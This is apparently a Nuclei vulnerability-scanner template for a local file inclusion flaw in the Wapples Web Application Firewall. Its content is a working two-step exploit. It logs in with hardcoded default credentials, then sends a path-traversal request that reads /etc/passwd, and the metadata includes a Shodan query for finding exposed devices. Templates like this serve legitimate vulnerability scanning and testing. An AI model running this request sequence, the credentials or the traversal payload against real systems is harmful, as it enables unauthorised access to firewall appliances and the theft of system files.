46 lines
1.4 KiB
YAML
46 lines
1.4 KiB
YAML
id: wapples-firewall-lfi
|
|
|
|
info:
|
|
name: Wapples Web Application Firewall - Local File Inclusion
|
|
author: For3stCo1d
|
|
severity: high
|
|
description: Wapples Web Application Firewall is vulnerable to local file inclusion.
|
|
reference:
|
|
- https://medium.com/@_sadshade/wapples-web-application-firewall-multiple-vulnerabilities-35bdee52c8fb
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cwe-id: CWE-22
|
|
cpe: cpe:2.3:a:pentasecurity:wapples:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
shodan-query: http.title:"Intelligent WAPPLES"
|
|
product: wapples
|
|
vendor: pentasecurity
|
|
tags: wapples,firewall,lfi,authenticated
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /webapi/auth HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
id={{username}}&password={{password}}
|
|
- |
|
|
GET /webapi/file/transfer?name=/../../../../../../../../etc/passwd&type=db_backup HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
attack: pitchfork
|
|
payloads:
|
|
username:
|
|
- systemi
|
|
password:
|
|
- db/wp.no1
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0"
|
|
# digest: 4b0a0048304602210088ef6443bff08e4ea427d4e992b9a72551aca7acb00cd5851923d8a1ce40ba670221008e8ad858560d437d1eb0f639bf40e1eccb1dcbff41de479aadd0af384dd7d45b:922c64590222798bb761d5b6d8e72950 |